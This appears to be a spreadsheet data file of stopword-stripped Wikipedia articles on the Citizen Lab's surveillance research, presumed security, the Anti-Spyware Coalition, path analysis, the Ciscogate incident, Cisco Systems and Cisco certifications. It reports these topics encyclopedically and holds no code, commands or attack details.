urls encryption keys various versions programs downloaded keyword blacklists daily. this work analyzed year half data tracking keyword lists, examined social political contexts behind content lists, analyzed times list updated, including correlations current events.current research focuses monitoring information controls popular chinese microblogging service sina weibo, chinese online encyclopedias, mobile messaging applications popular asia. asia chats project utilizes technical investigation censorship surveillance, assessment storage user data, comparison terms service privacy policies applications. first report released project examined regional keyword filtering mechanisms line applies chinese users.analysis popular cellphone called "smart sheriff", citizen german group cure53, asserted represented security hole betrayed privacy children meant protect parents. south korean required cellphones sold contain software designed protect children, smart sheriff popular government approved app—with 380,000 subscribers. citizen lab/cure53 report described smart sheriff's security holes "catastrophic". commercial surveillance citizen conducts research global proliferation targeted surveillance software toolkits, including finfisher, hacking team group. finfisher suite remote intrusion surveillance software developed munich-based gamma international gmbh marketed sold exclusively enforcement intelligence agencies uk-based gamma group. 2012, morgan marquis-boire bill marczak provided first public identification finfisher's software. citizen collaborators done extensive investigations finfisher, including revealing bahraini activists, analyzing variants finfisher suite target mobile phone operating systems, uncovering targeted spying campaigns political dissidents malaysia ethiopia, documenting finfisher command control servers countries. citizen lab's finfisher research informed inspired responses civil society organizations pakistan, mexico, united kingdom. mexico, example, local activists, politicians collaborated demand investigation state's acquisition surveillance technologies. crackdown sale software worries misuse repressive regimes.hacking team company based milan, italy, provides intrusion surveillance software called remote control system (rcs) enforcement intelligence agencies. citizen collaborators mapped network endpoints countries, revealed evidence used target human rights activist united arab emirates, moroccan citizen journalist organization, independent news agency members ethiopian diaspora. following publication hacking team targeting ethiopian journalists, electronic frontier foundation privacy international took legal action related allegations ethiopian government compromised computers ethiopian expatriates united states 2018, citizen released investigation global proliferation internet filtering systems manufactured canadian company, netsweeper, inc. laboratory identified netsweeper installations designed filter internet content operational networks countries focused histories human rights challenges: afghanistan, bahrain, india, kuwait, pakistan, qatar, somalia, sudan, united arab emirates, yemen. websites blocked countries include religious content, political campaigns, media websites. particular interest netsweeper's "alternative lifestyles" category, appears principal purposes blocking non-pornographic lgbtq content, including offered civil rights advocacy organizations, hiv/aids prevention organizations, lgbtq media cultural groups. citizen called government agencies abandon filtering lgbt content.since 2016, citizen published number reports "pegasus", spyware mobile devices developed group, israeli-based cyber intelligence firm. citizen lab's part series group 2016 2018. august 2018 report timed coordinate amnesty international's in-depth report group.in 2017, group released several reports showcased phishing attempts mexico used group technology. products used multiple attempts gain control mobile devices mexican government officials, journalists, lawyers, human rights advocates anti-corruption workers. operations used messages bait attempt trick targets clicking links group's exploit infrastructure. clicking links would lead remote infection target's phone. case, journalists—a minor time—was also targeted. nso, purports sell products governments, also came group's focus prominent human rights defender ahmed mansoor's mobile phone targeted. report attempts showed first time zero exploits wild prompted apple release security update 9.3.5, affecting billion apple users worldwide. 2020, citizen released report unveiling dark basin, hack-for-hire group based india.the citizen lab's research commercial surveillance technologies resulted legal policy impacts. december 2013, wassenaar arrangement amended include categories surveillance systems dual control list—"intrusion software" network surveillance systems". wassenaar arrangement seeks limit export conventional arms dual-use technologies calling signatories exchange information provide notification export activities goods munitions included control lists. amendments december 2013 product intense lobbying civil society organizations politicians europe, whose efforts informed citizen lab's research intrusion software like finfisher surveillance systems developed marketed blue coat systems. commercial filtering citizen studies commercial market censorship surveillance technologies, consists range products capable content filtering well passive surveillance. citizen developing refining methods performing internet-wide scans measure internet filtering detect externally visible installations filtering products. goal work develop simple, repeatable methodologies identifying instances internet filtering installations devices used conduct censorship surveillance. citizen conducted research companies blue coat systems, netsweeper, smartfilter. major reports include "some devices wander mistake: planet blue coat redux" (2013), pakistan, stand guard thee: analysis canada-based netsweeper’s role pakistan’s censorship regime" (2013), planet blue coat: mapping global censorship surveillance tools (2013).following 2011 publication "behind blue coat: investigations commercial filtering syria burma", blue coat systems officially announced would longer provide "support, updates. services" software syria. december 2011, u.s. department commerce's bureau industry security reacted blue coat evidence imposed $2.8 million fine emirati company responsible purchasing filtering products blue coat exporting syria without license. citizen lab's netsweeper research cited pakistani civil society organizations bytes bolo public interest litigation pakistani government formal complaints high commission (embassy) canada pakistan. corporate transparency governmental accountability citizen examines transparency accountability mechanisms relevant relationship corporations state agencies regarding personal data surveillance activities. this research investigated artificial intelligence canada's immigration refugee systems (co-authored international human rights program university toronto's faculty law), analysis ongoing encryption debates canadian context (co-authored canadian internet policy public interest clinic), close look consumer personal data requests canada.in summer 2017, government canada introduced national security legislation, bill c-59 (the national security act). proposed significantly change canada's national security agencies practices, including canada's signals intelligence agency (the communications security establishment). since bill first proposed, range civil society groups academics called significant amendments proposed act. co-authored paper citizen canadian internet policy public interest clinic represented detailed comprehensive analysis cse-related reforms date. policy engagement citizen participates various global discussions internet governance, internet governance forum, icann, united nations government group experts information telecommunications. since 2010, citizen helped organize annual cyber dialogue conference, hosted munk school global affairs’ canada centre, convenes individuals countries around world work government, civil society, academia, private enterprise effort better understand pressing issues cyberspace. cyber dialogue participatory format engages attendees moderated dialogue internet security, governance, human rights. other conferences around world, including high-level meeting hague-based scientific council government policy swedish government's stockholm internet forum, taken themes inspired discussions cyber dialogue. reception citizen number awards work. first canadian institution macarthur foundation’s macarthur award creative effective institutions (2014) canadian institution receive "new digital age" grant (2014) google executive chairman eric schmidt. past awards include electronic frontier foundation pioneer award (2015), canadian library association's advancement intellectual freedom canada award (2013), canadian committee world press freedom's press freedom award (2011), canadian journalists free expression’s libera award (2010).the citizen lab's work often cited media stories relating digital security, privacy controls, government policy, human rights, technology. since 2006, featured publications washington post, york times, globe mail, businessweek, jazeera, forbes, wired, bbc, bloomberg news, slate, salon, jakarta post. notes references external links official website</t>
  </si>
  <si>
    <t>Presumed security</t>
  </si>
  <si>
    <t>presumed security principle security engineering system safe attack attacker assuming, basis probability, secure. presumed security opposite security obscurity. system relying security obscurity actual security vulnerabilities, owners designers deliberately make system complex hope attackers unable find flaw. conversely system relying presumed security makes attempt address security flaws, publicly known, instead relies upon potential attackers simply assuming target worth attacking. reasons attacker make assumption range personal risk (the attacker believes system owners easily identify, capture prosecute them) technological knowledge (the attacker believes system owners sufficient knowledge security techniques ensure flaws exist, rendering attack moot). although approach security implicitly understood security professionals, rarely discussed documented. phrase "presumed security" appears first coined security commentary website zero flaws. article uses royal military academy sandhurst example, focusing apparent lack entry security contrasting presumed security military installation have. article also details flaws inherent trust seal verisign secure site seal, explains presumed security approach actually detrimental overall security posture. references notes</t>
  </si>
  <si>
    <t>Anti-Spyware Coalition</t>
  </si>
  <si>
    <t>anti-spyware coalition (asc) group formed 2005 goal build consensus definitions best practices debate surrounding spyware. composed anti-spyware software companies, academics, consumer groups, seeks bring together diverse array perspective problem controlling spyware potentially unwanted technologies. history formed 2005 dissolution consortium anti-spyware technology vendors (coast) broke internal dissent. april 2005 schwartz called together initial group anti-spyware companies; others later joined. series documents published, feedback solicited. first documents consisted definition spyware potentially unwanted technologies, vendor dispute resolution process. this followed "risk model" providing anti-spyware vendors framework classifying software. march 2007 published public final draft best practices document. references external links anti-spyware guidelines final version</t>
  </si>
  <si>
    <t>Path analysis (computing)</t>
  </si>
  <si>
    <t>path analysis, analysis path, portrayal chain consecutive events given user cohort performs period time using website, online game, ecommerce platform. subset behavioral analytics, path analysis understand user behavior order gain actionable insights data. path analysis provides visual portrayal every event user cohort performs part path period time. while possible track user's path site, even show path visual representation, real question gain actionable insights. path analysis simply outputs "pretty" graph, look nice, provide anything concrete upon. examples order path analysis first step would determine needs analyzed goals analysis. company might trying figure site running slow, certain types users interested certain pages products, user interface logical way. goal ways performing analysis. large percentage certain cohort, people ages 18–25, logs online game, creates profile spends next minutes wandering around menu page, user interface logical. seeing group users following path developer able analyze data realize creating profile, “play game” button appear. thus, path analysis able provide actionable data company error. ecommerce, path analysis help customize shopping experience user. looking products customers certain cohort looked buying one, company suggest “items also like” next customer increase chances making purchase. also, path analysis help solve performance issues platform. example, company looks path realizes site freezes certain combinations events. analyzing path progression events error, company pinpoint error evolution historically path analysis fell broad category website analytics, related analysis paths websites. path analysis website analytics process determining sequence pages visited visitor session prior desired event, visitor purchasing item requesting newsletter. precise order pages visited important specified. practice, analysis done aggregate, ranking paths (sequences pages) visited prior desired event, descending frequency use. idea determine features website encourage desired result. "fallout analysis," subset path analysis, looks "black holes" site, paths lead dead frequently, paths features confuse lose potential customers. with advent data along web-based applications, online games, ecommerce platforms, path analysis come include much path analysis. understanding users move app, game, platform part modern-day path analysis. understanding visitors real world visit shop shelves products placed random order. shop owner carefully analyzes visitors path walk shop, especially selecting buying products. next shop owner reorder shelves products optimize sales putting everything logical order visitors. supermarket typically result wine shelf next variety cookies, chips, nuts, etc. simply people drink wine nuts sites logic applied. visitors questions product product information support section site. from make logical step frequently asked questions page specific question. site owner also wants analyze visitor behavior. example, site offers products sale, owner wants convert many visitors completed purchase. sign-up form multiple pages, site owners want guide visitors final sign-up page. path analysis answers typical questions like: where visitors enter home page?is strong visitor relation product product site?. questions can't answered page hits unique visitors statistics. funnels goals google analytics provides path function funnels goals. predetermined path site pages specified every visitor walking path goal. this approach helpful analyzing many visitors reach certain destination page, called point analysis. using maps paths visitors walk site lead endless number unique paths. result, point analyzing path, look strongest paths. these strongest paths typically shown graphical text like: page page page exit. also funnel analysis cohort analysis website analytics data data mining analytics business intelligence test learn business process discovery statistics customer dynamics behavioral analytics references further reading "determining visitor behavior patterns". analytics tutorial. archived original 2013-12-06. gupta, srishti. user path analysis right path?". harris, jeff. "big data predictive analytics" (pdf). xerox services. cutroni, justin october 2011). "path analysis google analytics flow visualization". analytics talk. "big data" (pdf). technology roadmap. infocomm development authority sinagapore. coren, yehoshua. "understanding google analytics multi channel funnels". online-behavior.com.</t>
  </si>
  <si>
    <t>Ciscogate</t>
  </si>
  <si>
    <t>ciscogate, also known black bug, name given legal incident occurred black briefings security conference vegas, nevada, july 2005.on morning first conference, july 2005, attendees noticed pages text physically ripped extensive conference presentation booklet night request cisco systems cd-rom presentation slides included. determined pages covered talk given michael lynn, security researcher atlanta-based internet security systems (iss). instead pages details, attendees found photographed copy notice black saying "due last minute changes beyond black hat's control, request presenter, included materials standards black tries meet. black first apologize. hope vendors involved follow suit." according lynn's lawyer, employer approved talk leading conference changed minds days scheduled talk, forbidding presenting.lynn's original presentation cover vulnerability cisco routers. presentation four scheduled follow jeff moss' keynote address first conference, titled "cisco security architecture". after told employer could present topic, lynn chose alternate topic. cisco offered give joint presentation turned black original speaking slot given lynn, cisco. lynn's presentation began covering security issues services allow users make voice telephone calls. shortly beginning presentation lynn changed back original topic began disclosing technical details vulnerability found cisco routers stating would rather resign keep details private. lawsuit shortly lynn concluded talk jennifer granick, would soon become lawyer. during initial meeting lynn told granick expected sued. later evening lynn heard cisco filed lawsuit requested temporary restraining order black himself. public relations representative black told granick lawsuit black lynn companies scheduled parte hearing francisco next morning request restraining order. that night, andrew valentine, attorney cisco called lynn directed granick. during conversation valentine explained claims accusations lynn, included three things: claimed copyright presentation lynn gave, cisco claimed copyright decompiled machine code obtained router included presentation, cisco claimed presentation contained trade secrets. these complaints outlined civil complaint u.s. northern district california filed lynn black hat. according granick, valentine able agree injunction settle case without court proceedings. this deal almost called inadvertent mistake black restored lynn's presentation server. black hat, granick, plaintiff's lawyers able resolve problem deal stood.one condition settlement required lynn provide image computer data used research provided third party forensic analysis erasing research cisco data systems. settlement also stipulated lynn prohibited talking vulnerability future. investigation shortly lawyers lynn cisco filed settlement papers, agents vegas office arrived conference begin asking questions. according granick, request atlanta office lynn interest. granick asserted fifth sixth amendment rights behalf client, lynn. granick asserted rights atlanta office asked arrest warrant issued lynn. over next hours granick able ascertain status warrant ultimately determined warrant issued.when asked case journalist, spokesman paul bresson declined discuss case saying "our policy make comment anything ongoing. that's confirm something really know". granick would confirm journalists "investigation presentation". response attendees attendees black briefings, well many also attended con, happy vendors threatening legal action vulnerability disclosure. term "ciscogate" coined quickly unknown person, attendees quick create shirts commemorate incident. cisco mojgan khalili, senior manager corporate cisco, issued statement press saying important note information lynn presented disclosure vulnerability flaw cisco software. lynn's research explores possible ways expand exploitations existing security vulnerabilities impacting routers." duffy, managing director australia, asked iss's response incident. duffy responded "business usual" company handled incident "strictly book". gave brief statement zdnet saying "iss published rules disclosure stick care publish [the disclosure] ready. completed research satisfaction ready disclosed". spokesperson roger fortier confirmed lynn longer employed company still working cisco matter. gave statement washington post saying "iss cisco working background feel time material ready publication. decision made monday pull presentation wanted make sure research fully baked." references</t>
  </si>
  <si>
    <t>Cisco</t>
  </si>
  <si>
    <t>cisco systems, inc., commonly known cisco, american-based multinational technology conglomerate corporation headquartered jose, california. integral growth silicon valley, cisco develops, manufactures, sells networking hardware, software, telecommunications equipment high-technology services products. cisco specializes specific tech markets, internet things (iot), domain security, videoconferencing, energy management leading products including webex, opendns, jabber, security, jasper. cisco largest technology companies world ranking fortune billion revenue nearly 80,000 employees.cisco systems founded december 1984 leonard bosack sandy lerner, stanford university computer scientists instrumental connecting computers stanford. they pioneered concept local area network (lan) used connect distant computers multiprotocol router system. time company went public 1990, cisco market capitalization $224 million; dot-com bubble year 2000, increased $500 billion, surpassing microsoft world's valuable company. december 2021, cisco market capitalization around $267 billion.cisco stock (csco) added jones industrial average june 2009, also included index, russell 1000 index, nasdaq-100 index russell 1000 growth stock index.in 2021, fortune ranked cisco number second year annual list best companies work based employee satisfaction surveying. linkedin glassdoor also ranked cisco place work 2021 recent years. history 1984–1995: origins initial growth cisco systems founded december 1984 sandy lerner along husband leonard bosack. lerner director computer facilities stanford university graduate school business. bosack charge stanford university computer science department's computers.cisco's initial product roots stanford university's campus technology. early 1980s students staff stanford, including bosack, used technology campus link school's computer systems talk another, creating functioned multiprotocol router called "blue box". blue used circuitry made andy bechtolsheim, software originally written stanford research engineer william yeager. underlying architecture, ability scale well, yeager's well-designed invention became cisco's early success.in 1985, bosack stanford employee kirk lougheed began project formally network stanford's campus. they adapted yeager's software became foundation cisco ios, despite yeager's claims denied permission sell blue commercially. july 1986, bosack lougheed forced resign stanford university contemplated filing criminal complaints cisco founders theft software, hardware designs, intellectual properties. 1987, stanford licensed router software computer boards cisco. addition bosack, lerner, lougheed, greg satz programmer), richard troiano (who handled sales), completed early cisco team. company's first bill graves, held position 1987 1988. 1988, john morgridge appointed ceo.the name "cisco" derived city name francisco, company's engineers insisted using lower case "cisco" early years. logo intended depict towers golden gate bridge.on february 1990, cisco systems went public market capitalization $224 million, listed nasdaq stock exchange. august 1990, lerner fired. upon hearing news, husband bosack resigned protest.although cisco first company develop sell dedicated network nodes, first sell commercially successful routers supporting multiple network protocols. classical, cpu-based architecture early cisco devices coupled flexibility operating system allowed keeping evolving technology needs means frequent software upgrades. some popular models time (such cisco 2500) managed stay production almost decade virtually unchanged. company quick capture emerging service provider environment, entering market product lines cisco 7000 cisco 8500.between 1992 1994, cisco acquired several companies ethernet switching, kalpana, grand junction notably, mario mazzola's crescendo communications, together formed catalyst business unit. time, company envisioned layer routing layer (ethernet, token ring) switching complementary functions different intelligence architecture—the former slow complex, latter fast simple. this philosophy dominated company's product lines throughout 1990s.in 1995, john morgridge succeeded john chambers. 1996–2005: internet silicon intelligence internet protocol (ip) became widely adopted mid-to-late 1990s. cisco introduced products ranging modem access shelves (as5200) core routers, making major player market. late march 2000, height dot-com bubble, cisco became valuable company world, market capitalization $500 billion. july 2014, market us$129 billion, still valuable companies.the perceived complexity programming routing functions silicon formation several startups determined find ways process mpls packets entirely hardware blur boundaries routing switching. them, juniper networks, shipped first product 1999 2000 chipped away cisco market share. response, cisco later developed homegrown asics fast processing cards routers catalyst 6500 switches. 2004, cisco also started migration high-end hardware crs-1 software architecture 2006–2012: human network part rebranding campaign 2006, cisco systems adopted shortened name "cisco" created "the human network" advertising campaign. these efforts meant make cisco "household" brand—a strategy designed support low-end linksys products future consumer products.on traditional business side, cisco continued develop routing, switching security portfolio. quickly growing importance ethernet also influenced company's product lines. limits aging crescendo architecture also forced cisco look merchant silicon carrier ethernet segment. this resulted 9000 product family intended consolidate company's carrier ethernet subscriber management business around ezchip-based hardware ios-xr.throughout mid-2000s, cisco also built significant presence india, establishing globalization centre east bangalore billion. cisco also expanded markets acquisition—one example 2009 purchase mobile specialist starent networks.cisco continued challenged domestic competitors alcatel-lucent, juniper networks, overseas competitor huawei. lower-than-expected profit 2011, cisco reduced annual expenses billion. company around 3,000 employees early-retirement program accepted buyout planned eliminate many 10,000 jobs (around percent 73,400 total employees curtailment). during 2011 analyst call, cisco's john chambers called several competitors name, including juniper july 2012, cisco received approval acquire software developer) us$5 billion. 2013, cisco sold linksys home-router unit belkin international inc., signaling shift sales businesses rather consumers. present july 2013, cisco systems announced definitive agreement acquire sourcefire $2.7 billion. august 2013, cisco systems announced would 4,000 jobs workforce, roughly starting 2014. 2013, cisco announced poor revenue depressed sales emerging markets, caused economic uncertainty fears national security agency planting backdoors products.in april 2014, cisco announced funding early-stage firms focus internet things. investment fund allocated investments accelerators startups alchemist accelerator, ayla networks evrythng. later year, company announced laying another 6,000 workers global workforce, part second restructuring. november 2014, cisco announced investment stratoscale.on 2015, cisco announced chairman john chambers would step july 2015, remain chairman. chuck robbins, senior vice president worldwide sales operations 17-year cisco veteran, announced next ceo. july 2015, cisco announced divestiture television set-top-box cable modem business technicolor $600 million, division originally formed cisco's $6.9 billion purchase scientific atlanta. deal came part cisco's gradual exit consumer market, part effort cisco's leadership focus cloud-based products enterprise segments. cisco indicated would still collaborate technicolor video products. november 2015, cisco, alongside holdings, dell, intel, microsoft princeton university, founded openfog consortium, promote interests development computing.in january 2016, cisco invested velocloud, software-defined (sd-wan) start-up cloud offering configuring optimizing branch office networks. cisco contributed velocloud's million series round, march capital partners.in february 2017, cisco launched cloud-based secure internet gateway, called cisco umbrella, provide safe internet access users corporate networks vpns connect remote data centers. immediately reporting fourth-quarter earnings 2017, cisco's price-per-share value jumped earnings share ratio increased cents share, part cisco's outperformance analyst expectations. september 2017, chambers announced would step executive chairman role term board december 2017. december 2017, robbins elected succeed chambers executive chairman retaining role ceo, chambers given title "chairman emeritus".reuters reported "cisco systems inc’s (csco.o) product revenue russia grew percent 2017, ahead cisco’s technology product revenue growth so-called bric countries brazil, china india."on 2018, cisco systems agreed ai-driven business intelligence startup accompany $270 million. june 2018, cisco systems ranked 444th forbes global 2000 list, $221.3 billion market cap.in 2019, cisco acquired cloudcherry, customer experience management company, voicea, artificial intelligence company.in march 2020, enterprise networking david goeckeler left become western digital corp. replaced todd nightingale, head cisco meraki. finance fiscal year 2018, cisco reported earnings us$0.1 billion, annual revenue us$49.3 billion, increase 2.8% previous fiscal cycle. cisco's shares traded share, market capitalization valued us$213.2 billion september 2018. income fiscal year 2018 attributed one-time charge, allowed cisco bring back capital overseas. cisco used money able bring back lower rate fund share buybacks acquisitions. corporate structure acquisitions subsidiaries cisco acquired variety companies spin products talent company. 1995–1996 company completed acquisitions. several acquisitions, stratacom, biggest deals industry occurred. during internet boom 1999, company acquired cerent corporation, start-up company located petaluma, california, us$7 billion. expensive acquisition made cisco date, acquisition scientific atlanta larger. 1999 cisco also acquired stake billion kpmg consulting enable establishing internet firm metrius founded keyur patel fuse. several acquired companies grown $1bn+ business units cisco, including switching, enterprise voice internet protocol (voip) platform webex home networking. latter came result cisco acquiring linksys 2003 2010 supplemented product line dubbed cisco valet. cisco announced january 2005, would acquire airespace us$450 million reinforce wireless controller product lines.cisco announced january 2007, would ironport deal valued us$830 million completed acquisition june 2007. ironport best known ironport antispam, senderbase email reputation service email security appliances. accordingly, ironport integrated cisco security business unit. ironport's senderbase renamed sensorbase take account input database cisco devices provide. sensorbase allows devices build risk profile addresses, therefore allowing risk profiles dynamically created http sites smtp email sources.cisco announced march 2012, would acquire group $5bn. transaction completed july 2012.in recent merger deals, cisco bought starent networks mobile packet core company) moto development group, product design consulting firm helped develop cisco's flip video camera. also 2010, cisco became stakeholder e-skills week. march 2011, cisco completed acquisition privately held network configuration change management software company pari networks.although many buy-ins (such crescendo networks 1993, tandberg 2010) resulted acquisition flagship technology cisco, many others failed—partially completely. instance, 2010 cisco occupied meaningful share packet-optical market, revenues still us$7 billion price paid 1999 cerent. some acquired technologies (such flip pure digital) product lines terminated. january 2013, cisco systems acquired israeli software maker intucell around $475 million cash, move expand mobile network management offerings. month, cisco systems acquired cognitive security, company focused cyber threat protection. cisco also acquired solvedirect (cloud services) march 2013 ubiquisys (mobile software) april 2013. cisco acquired cyber-security firm sourcefire, october 2013. june 2014, cisco announced completed acquisition threatgrid, company provided dynamic malware analysis threat intelligence technology.on june 2014, cisco announced intent acquire privately held tail-f systems, leader multi-vendor network service orchestration solutions traditional virtualized networks.on april 2015, cisco announced plans embrane, software-defined networking startup. deal give cisco embrane's software platform, provides layer network services things firewalls, termination, server load balancers offload.on 2015, cisco announced plans tropo, cloud platform simplifies addition real-time communications collaboration capabilities within applications.on june 2015, cisco acquired privately held opendns, company best known service adds level security monitoring domain name requests.on august 2015, cisco announced completed acquisition privately held maintenancenet, us-based company best known cloud-based contract management platform serviceexchange. month, cisco acquired pawaa, privately held company bangalore, india provides secure on-premises cloud-based file-sharing software.on september 2015, cisco announced intent acquire privately held portcullis computer security, uk-based company provides cybersecurity services enterprise clients government sectors.on october 2015, cisco announced intent acquire parstream, privately held company based cologne, germany, provides analytics database allows companies analyze large amounts data store near real-time anywhere network.on october 2015, cisco announced would acquire lancope, company focuses detecting threat activity, $452.5 million cash-and-equity deal.on june 2016, cisco announced intent acquire cloudlock, privately held cloud security company founded 2011 three israeli military veterans, $293 million. deal expected close first quarter 2017. august 2016, cisco announced getting closer making deal acquire springpath, startup whose technology used cisco's hyperflex systems. cisco already owns undisclosed stake hyper-converged provider.in january 2017, cisco announced would acquire appdynamics, company monitors application performance, $3.7 billion. acquisition came appdynamics ipo.on january 2017, cisco founded innovation alliance germany eleven companies bringing together sites 2,000 staff provide small businesses germany expertise.on august 2017, cisco completed acquisition viptela inc. $610 million cash assumed equity awards. viptela privately held software-defined wide area network (sd-wan) company based jose, october 2017, cisco systems announced would acquiring broadsoft $1.9 billion entrench cloud communication collaboration area.on august 2020, cisco completed acquisition network intelligence company thousandeyes.on october 2020, cisco announced would acquiring israeli startup portshift reported $100 million.on december 2020, cisco announced would acquiring slido improve q&amp;a, polls engagement webex videoconferencing december 2020, cisco announced acquisition based imimobile $730m deal.on 2021, cisco completed acquisition polling platform slido. ownership 2017 cisco systems shares mainly held institutional investors (the vanguard group, blackrock, state street corporation others). facilities cisco headquartered jose, california west tasman dozens buildings comprising corporate campus. over 15,000 full-time employees based jose campus surrounding area. cisco's second largest campus united states located research triangle park north carolina 7,000 employees spanning across buildings.in august 2020, cisco announced creation 130,000 square feet midwest headquarters chicago chicago main post office accommodating 1,200 employees. cisco maintains corporate offices countries. july 2021, cisco announced employees option work remotely permanent basis. products services cisco's products services focus three market segments—enterprise, service provider, midsize small business. cisco provides products services across five major technology areas: networking (including ethernet, optical, wireless mobility), security, collaboration (including voice, video, data), data center, internet things.cisco grown increasingly popular asia-pacific region last three decades dominant vendor australian market leadership across market segments. uses australian office main headquarters asia-pacific region. voip services cisco became major provider voice enterprises moving home user market acquisitions scientific atlanta linksys. scientific atlanta provides voip equipment cable service providers time warner, cablevision, rogers communications, others; linksys partnered companies skype, microsoft yahoo! integrate consumer voip services wireless cordless phones. hosted collaboration solution (hcs) cisco partners offer cloud-based services based cisco's virtualized unified computing system (ucs). part cisco unified services delivery solution includes hosted versions cisco unified communications manager (ucm), cisco unified contact center, cisco unified mobility, cisco unified presence, cisco unity connection (unified messaging) cisco webex meeting center. network emergency response part tactical operations initiative, cisco maintains several network emergency response vehicles (nerv)s. vehicles maintained deployed cisco employees natural disasters public crises. vehicles self-contained provide wired wireless services including voice radio interoperability, voice network-based video surveillance secured high-definition video-conferencing leaders first responders crisis areas mbit/s bandwidth down) 1.8-meter satellite antenna.nervs based cisco headquarters sites jose, california, research triangle park, north carolina, allowing strategic deployment north america. they become fully operational within minutes arrival. high-capacity diesel fuel-tanks allow largest vehicles hours continuously. nerv deployed incidents october 2007 california wildfires; hurricanes gustav, katrina; 2010 bruno pipeline explosion, tornado outbreaks north carolina alabama 2011; hurricane sandy 2012.the tactical operations team maintains deploys smaller, portable communication kits emergencies outside north america. 2010, team deployed assist earthquake recovery haiti christchurch (new zealand). 2011, deployed flooding brazil, well response 2011 earthquake tsunami japan.in 2011, cisco received innovation preparedness award american cross silicon valley chapter development vehicles disasters. certifications cisco systems also sponsors line professional certifications cisco products. there four five (path network designers) levels certification: entry (ccent), associate (ccna/ccda), professional (ccnp/ccdp), expert (ccie/ccde) recently architect (ccar: ccde previous), well nine different paths, routing switching, design, industrial network, network security, service provider, service provider operations, storage networking, voice, datacenter wireless. number specialist technicians, sales, datacenter certifications also available. cisco also provides training certifications portal called cisco networking academy. qualifying schools become members cisco networking academy provide ccna level level courses. cisco academy instructors must ccna certified ccai certified instructor. cisco involved technical education countries cisco academy program. march 2013, cisco announced interest myanmar investing cisco networking academies yangon mandalay channel partner network. corporate affairs awards accolades cisco products, including phones telepresence, seen movies series. company featured documentary film something ventured premiered 2011.cisco 2002–03 recipient brown award, u.s. presidential honor recognize companies "for exemplary quality relationships employees communities". cisco ranked number great place work's world's best workplaces 2019. 2020, fortune magazine ranked cisco systems number four fortune list companies work 2020 based employee survey satisfaction.according report technology consulting firm lexinnova, cisco leading recipients network security-related patents largest portfolio within companies (6,442 security-related patents) 2015. controversies shareholder relations class action lawsuit filed april 2001, accused cisco making misleading statements "were relied purchasers cisco stock" insider trading. while cisco denied allegations suit, august 2006, cisco's liability insurers, directors officers paid plaintiffs us$91.75 million settle suit. intellectual property disputes december 2008, free software foundation filed suit cisco regarding cisco's failure comply lgpl license models make applicable source code publicly available. 2009, cisco settled lawsuit complying licensing terms making monetary contribution fsf.in october 2020, cisco ordered us$1.9 billion centripetal networks infringement four cybersecurity patents. censorship china cisco criticized involvement censorship people's republic china. according author ethan gutmann, cisco telecommunications equipment providers supplied chinese government surveillance internet infrastructure equipment used block internet websites track online activities china. cisco stated customize develop specialized unique filtering capabilities enable governments block access information sells equipment china sells worldwide.wired news uncovered leaked, confidential cisco powerpoint presentation detailed commercial opportunities golden shield project internet control. 2011, group falun gong practitioners filed lawsuit alien tort statute alleging cisco knowingly developed customized product assist chinese government prosecution abuse falun gong practitioners. lawsuit dismissed september 2014 united states district court northern district california, decision appealed united states court appeals ninth circuit september 2015. fraud investigation october 2007, employees cisco's brazilian unit arrested charges imported equipment without paying import duties. response, cisco stated import directly brazil, instead middlemen. antitrust lawsuit december 2008, multiven filed antitrust lawsuit cisco systems, inc. multiven's complaint alleges cisco harmed multiven consumers bundling tying fixes/patches updates operating system software maintenance services (smartnet). 2010, cisco accused person filed antitrust suit, british-nigerian technology entrepreneur peter alfred-adekeye, hacking pressured government extradite canada. cisco settled antitrust lawsuit months alfred-adekeye's arrest making software updates available multiven customers. remotely monitoring users' connections cisco's linksys e2700, e3500, e4500 devices reported remotely updated firmware version forces users register cloud service, allows cisco monitor network ultimately shut cloud service account thus render affected router unusable. firewall backdoor developed according german magazine spiegel developed jetplow gaining access (series 5505, 5510, 5520, 5540 5550) 500-series firewalls.cisco's chief security officer addressed allegations publicly denied working government weaken cisco products exploitation implement security back doors.a document included trove national security agency files released glenn greenwald's book place hide details agency's tailored access operations (tao) unit employees intercept servers, routers network gear shipped organizations targeted surveillance install covert firmware onto delivered. these trojan horse systems described manager "some productive operations pre-position access points hard target networks around world."cisco denied allegations customer document saying information included specific cisco products, supply chain intervention implant techniques, security vulnerabilities. cisco's general counsel also said cisco work government, including united states government, weaken products. allegations reported prompted company's express concern president united states. spherix patent suit march 2014, cisco systems sued patent infringement. spherix says billion cisco's sales infringe nortel patents owned spherix. officials spherix saying wide range cisco products, switches routers, infringe former nortel patents company owns. india censorship role april 2020 cisco systems alleged helping indian jammu kashmir administration build firewall prevent internet users kashmir accessing blacklisted websites, including social media portals, fixed-line connections. cisco denies allegations. caste discrimination lawsuit 2020, lawsuit initiated cisco employees california department fair employment housing alleged discrimination indian engineer account lower caste them. xinjiang region 2020, australian strategic policy institute accused least major brands, including cisco, connected forced uyghur labor xinjiang. also references further reading external links official website business data cisco systems, inc.:</t>
  </si>
  <si>
    <t>Cisco certifications</t>
  </si>
  <si>
    <t>cisco certifications list certifications offered cisco systems. there four five (path network designers) levels certification: associate (ccna/ccda), professional (ccnp/ccdp), expert (ccie/ccde) recently architect (ccar: ccde previous), well nine different paths specific technical field; routing switching, design, industrial network, network security, service provider, service provider operations, storage networking, voice, datacenter wireless. there also number specialist technician, sales, business, data center certifications, ccai certified instructor (cisco academy instructor). paths primary certification table shows different paths levels cisco certifications. certifications, except ccar, require passing theoretical exams offered pearson vue. ccie certifications also require hands-on exam administered special labs around world. february 2020, cisco altered certification structure. entry level certificate: associate level certificates: ccna, devnet associate, cyberops associate. professional level certificates ccnp devnet, ccnp enterprise, ccnp collaboration, ccnp data center, ccnp security, ccnp service provider, cyberops professional expert level certificates ccde, ccie infrastructure, ccie enterprise wireless, ccie collaboration, ccie data center, ccie security, ccie service provider. source: https://www.cisco.com/c/dam/en_us/training-events/certifications/career-path.pdf primary certifications cisco certified entry networking technician (ccent) cisco certified entry networking technician represents lowest level certification covers basic networking knowledge. until introduction, ccna represented first level certification program. appropriate entry-level network support position. ccent certified staff install, manage troubleshoot small enterprise network, including basic network security. first step towards ccna certification must start ccent. 2017, cisco introduced icnd1 icnd2 exams (needed ccna routing switching). icnd1: 100-105 (interconnecting cisco networking devices part v3.0) became exam required ccent. with change, ccent became sufficient pre-requirement ccna security, ccna voice ccna wireless. exam blueprints found here: https://web.archive.org/web/20170301190947/https://learningcontent.cisco.com/cln_storage/text/cln/marketing/exam-topics/100-105-icnd1-v3.pdf valid years. cisco certified technicians (cct) cisco certified technicians skills diagnose, restore, repair, replace critical cisco networking system devices 